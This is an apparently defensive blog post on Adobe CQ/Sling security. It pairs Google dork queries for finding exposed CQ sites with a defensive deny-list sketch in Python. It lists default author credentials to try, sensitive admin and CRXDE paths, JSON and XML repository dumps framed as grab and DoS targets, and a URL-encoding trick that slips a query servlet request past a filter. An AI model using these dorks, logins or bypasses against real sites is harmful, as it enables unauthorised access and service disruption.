April 13, 2020

CQ-related Google queries

This query returns many CQ sites:
http://www.google.com/search?q=inurl:/content/geometrixx
Many of the sites accept .json rendering (-1.json, 34324232.json, etc.). Some also accept .query.json?statement=//*
That makes them easy targets for content grabbing and DoS attacks.

Also, this:
http://www.google.com/search?q=inurl:/content/dam
Usually, /content/dam.xml is large, which makes it an easy DoS target.

And,
http://www.google.com/search?q=%22/etc/designs/*.css%22
Many sites block .json on /content, but they still allow .json on /etc.

These queries show a few author instances (try default CQ logins other than admin:admin, such as author:author):
http://www.google.com/search?q=%22cq5%20login%22
http://www.google.com/search?q=inurl:%22/etc/replication%22

Once you locate a CQ site, you can try various paths:
/system/console
/admin
/etc/replication
/crx
/crxde
/bin/crxde/logs
/libs/cq/core/content/login.html
/libs/crxde/resources/welcome.html

Also, try JSON servlets:
http://www.adobe.com/etc/pagetables/feed_proxies.tidy.-2345.json?asdf

The format is:
/some/resource.<depth>.json

If things are blocked, try again with some of the characters replaced by their URL-encoded forms.

For example, this returns a 404:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//element%28*,cq:Page%29

But this one goes through:
https://author.day.com/libs/cq/core/content/login.qu%65ry.js%6Fn?statement=//element(*,cq:Page)

The "e" in query is replaced with %65 and the "o" in json with %6F.

Most of these are possible because of Sling: http://sling.apache.org/
Usually, databases listen on a different port (and speak a protocol other than HTTP) than the HTTP application in front of them. Even databases that use HTTP (such as CouchDB, http://couchdb.apache.org/) can be configured to use a port different from the HTML rendering server's. Sling, however, exposes the entire repository (JCR) content on the same port that HTTP clients use.

Sling does have an access control mechanism, but the common development paradigm for Sling is to expose all resources to everyone.

You could instead expose only a few resources and have their resourceType query and access the actual content resources.
For example, instead of exposing the following:
/content/a.html
/content/b.html
/content/c.html
....


You can expose only one resource:
/content/pages

And have the resourceType of /content/pages handle GET requests to:
/content/pages.a.html
/content/pages.b.html
/content/pages.c.html
...
by reading the actual content from:
/hidden/a
/hidden/b
/hidden/c
...


Or, you can have a proxy server block the various paths that could be used maliciously. For example, CQ ships a dispatcher module for Apache httpd; you can configure dispatcher.any to deny access to various globs.
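Whatever does the blocking, it has to normalise the request before matching, or the %65/%6F trick above walks straight past it. The Python sketch below is an added example, not code from this post or from the dispatcher: it decodes the path until stable, splits it into resource path, selectors and extension the way Sling does (simplified to the first-dot rule; real Sling prefers the longest existing resource path), and then applies an assumed deny list built from the paths listed in this post. The naive raw-string filter is included only to show what the encoded variant slips past.

```python
from fnmatch import fnmatchcase
from urllib.parse import unquote, urlsplit

# Assumed deny list for illustration: the paths listed in this post, the
# repository dump renderings (.json / .xml) and the query servlet selector.
DENY_PATH_GLOBS = [
    "/system/console*", "/admin*", "/etc/replication*", "/crx*", "/crxde*",
    "/bin/crxde/logs*", "/libs/cq/core/content/login*",
    "/libs/crxde/resources/welcome*",
]
DENY_EXTENSIONS = {"json", "xml"}   # e.g. /content/dam.xml, /content/x.-1.json
DENY_SELECTORS = {"query"}          # e.g. login.query.json?statement=//*

def sling_parse(url):
    """Decode the request path and split it the way Sling does:
    /a/b.sel1.sel2.ext -> ('/a/b', ['sel1', 'sel2'], 'ext').
    Simplified: the first dot in the last segment ends the resource name
    (real Sling prefers the longest existing resource path)."""
    path = urlsplit(url).path
    # Decode until stable so %65 and a double-encoded %2565 both become 'e'.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    head, _, last = path.rpartition("/")
    name, _, rest = last.partition(".")
    resource = f"{head}/{name}"
    if not rest:
        return resource, [], ""
    parts = rest.split(".")
    return resource, parts[:-1], parts[-1]

def naive_is_blocked(url):
    """A filter on the raw request string: misses the %65/%6F variant."""
    raw = urlsplit(url).path
    return raw.endswith(".json") or ".query." in raw

def is_blocked(url):
    """Normalise first, then decide on resource path, selectors and extension."""
    resource, selectors, ext = sling_parse(url)
    if any(fnmatchcase(resource, g) for g in DENY_PATH_GLOBS):
        return True, f"path {resource}"
    if ext in DENY_EXTENSIONS:
        return True, f"extension .{ext}"
    hit = DENY_SELECTORS.intersection(selectors)
    if hit:
        return True, f"selector {sorted(hit)[0]}"
    return False, "allowed"
```

Denying .json and .xml everywhere and allowlisting the few renderings a site really needs is the safer default than blocking them under /content only, as the post notes many sites do.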


By aem4beginner
